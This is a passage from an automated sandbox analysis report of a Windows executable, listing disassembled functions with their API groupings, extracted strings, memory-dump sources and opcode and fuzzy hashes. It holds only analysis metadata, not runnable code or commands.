                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            • Opcode ID: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                            • Instruction ID: 463773fbc14c50b1132d5ecc9a99dc81d5f6737ed5de93528b5b5d6b5400a285
                                                            • Opcode Fuzzy Hash: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                            • Instruction Fuzzy Hash: 56A1B6BAF08A1286EB14AB61E44477C6B61BF49BA5F804336DE2E17BD8DF3C9444C351
                                                            Function 00007FF7EC1A4F30 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                            • Instruction ID: 90c185526ae4e6d0d19721c92de71bfc226dc2a6f99547aea045c55304928511
                                                            • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                            • Instruction Fuzzy Hash: 9CB15EE9B0CE42D0EA64BB69F5403B8A761BF50784BD85133D90E07A99DF3CE945D322
                                                            Function 00007FF7EC1CECB4 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                            • Instruction ID: f2349a7596a7091d479e288924a157aa8b588ce8ef50b23cc325b85c02d63cbc
                                                            • Opcode Fuzzy Hash: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                            • Instruction Fuzzy Hash: C871B5BAB08A4186E724AB11F84473AB761FB89BA1F404336DD6E43B98DF3CD444C711
                                                            Function 00007FF7EC1C6EA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 268windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: tooltips_class32
                                                            • API String ID: 698492251-1918224756
                                                            • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                            • Instruction ID: 1cbaa817df6c31c703e76f837e105291d6e65ab30cebc73a80aff51ec887a216
                                                            • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                            • Instruction Fuzzy Hash: CEC17EBAA08B418AE718DF65E4447ADB7A0FB89B84F900036EA5E47754CF7CE841C751
                                                            Function 00007FF7EC192C10 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 175windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID: @
                                                            • API String ID: 3869813825-2766056989
                                                            • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                            • Instruction ID: a7937fe378ef201300973a2cdc79e682c318b2485a467803196771f2aa94708f
                                                            • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                            • Instruction Fuzzy Hash: EF818DBAA04A4286E740EF79E85076D77A1FB44B89F804532CE0EA775CDF38E845C721
                                                            Function 00007FF7EC122620 Relevance: 28.7, APIs: 19, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Color$LongWindow$ModeObjectStockText
                                                            • String ID:
                                                            • API String ID: 554392163-0
                                                            • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                            • Instruction ID: 87eefe74d069ad9fef925d6ee1c594b4ca6ae61db1778768f3016f57045d9c90
                                                            • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                            • Instruction Fuzzy Hash: 9881D2ADD0855381EA34AB29B44877DA391EF45761FD50233CD9E072A8DE3CA882C723
                                                            Function 00007FF7EC19C81C Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 222038402-1459072770
                                                            • Opcode ID: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                            • Instruction ID: 5584bf1633ab9b102301e2c57a377e5a4b9c7043c9b8167d8189c7242a40e49a
                                                            • Opcode Fuzzy Hash: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                            • Instruction Fuzzy Hash: 585171AAB0864246EA14FB16B5113B9A352BF85FD0FC04432DD4E4BB95EF3CE501C726
                                                            Function 00007FF7EC1C6608 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 475windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                            • Instruction ID: 24033fbe68368ef9726db6231e1fd76b742c047240ea90324a3afb81b5d26373
                                                            • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                            • Instruction Fuzzy Hash: B812C39FB1865382EE58BB65A8417BDE7A0AF54BD4B844533EE0D46791EE3CE401C332
                                                            Function 00007FF7EC1A3FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1600147383-4113822522
                                                            • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                            • Instruction ID: 7250426bc9c943c3c18d255ac7abedaf8f7b8cd7a95f40892861249fcd4b516e
                                                            • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                            • Instruction Fuzzy Hash: BB81BFAAB14A42C5EB00AB65E8403BCA3A1FB54B88F944433CE0D47794DF3CE956C362
                                                            Function 00007FF7EC1D0118 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 258715311-1154884017
                                                            • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                            • Instruction ID: 9ffe51f2b464b2abd6978733ef95f6159f0bb397feeb1d25b5f6a9dfba560185
                                                            • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                            • Instruction Fuzzy Hash: 8771E7BAA0575286EB14EF21A444779A7A0FF44B95F840637DD2E47798DF3CD444C321
                                                            Function 00007FF7EC1D03D0 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3840717409-0
                                                            • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                            • Instruction ID: 30bddb02242bf42fc43042f5e1181f6db9419e3956f80b1719db25be45590e3c
                                                            • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                            • Instruction Fuzzy Hash: 475168BAB14B01C6EB14DF66E808B6D77A0FB88B96B904536DE2E03B08DF39D405C711
                                                            Function 00007FF7EC1A0D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit
                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                            • API String ID: 2610073882-3931177956
                                                            • Opcode ID: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                            • Instruction ID: a063ab2cac0f4385864596f2881844a1471248501db1feddf68d206e0665a4f0
                                                            • Opcode Fuzzy Hash: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                            • Instruction Fuzzy Hash: 390291BAA08642C5E658BF25E15437CA3A1FF04B50F9D8937DA0E07A94DF3DE450D322
                                                            Function 00007FF7EC1A246C Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 281fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                            • String ID: aut
                                                            • API String ID: 130057722-3010740371
                                                            • Opcode ID: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
                                                            • Instruction ID: 51b6466badabdd22ca07e9e7c83b09fbacb817fb93031134f4c07400f3a78571
                                                            • Opcode Fuzzy Hash: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
                                                            • Instruction Fuzzy Hash: 91C162BA61868695EB20EF25F8407EDA761FB94788F804037EA8D47B59DF3CD205C712
                                                            Function 00007FF7EC1CE40C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 177windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                            • String ID: tooltips_class32
                                                            • API String ID: 2443926738-1918224756
                                                            • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                            • Instruction ID: d31dc8ce5631375074448b48b5053d1105407f6221a1be206a2d59100666431f
                                                            • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                            • Instruction Fuzzy Hash: 9C918ABAA18B858AEB50DF65E4407ADB7A1FB88B84F904036EE4D07B58DF3CD445C721
                                                            Function 00007FF7EC1A8BF4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                            • String ID: *.*
                                                            • API String ID: 1111067124-438819550
                                                            • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                            • Instruction ID: c460977dd0bd891fac71178d641aca6e6ca9894e09331a885b791d757c31d117
                                                            • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                            • Instruction Fuzzy Hash: 1C7192BA618B86D1EB10FF11E8402EEB761FB84B88F844032EA4D4B766DF39D546C751
                                                            Function 00007FF7EC1B4F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID:
                                                            • API String ID: 2598888154-3916222277
                                                            • Opcode ID: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                            • Instruction ID: c007c69238df045e80a7ad729c4ebd3947b9a53fc80f8f2665a169153d4d8582
                                                            • Opcode Fuzzy Hash: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                            • Instruction Fuzzy Hash: 445147BAB15641CBE750DF65F444AADBBB1F748B88F40812AEE4A53B18CF38E415CB11
                                                            Function 00007FF7EC18B0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 2706829360-2785691316
                                                            • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                            • Instruction ID: 0577ea6e9d1dc60c2eb19d23a877c3498756e6d31f10992c8821d2bf23ec3335
                                                            • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                            • Instruction Fuzzy Hash: 835153A6A19A5289EB00EF65E9407BC7771FB84B89F804032DA0E47659DF38D089C361
                                                            Function 00007FF7EC1C1110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7EC1BFD7B), ref: 00007FF7EC1C1143
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
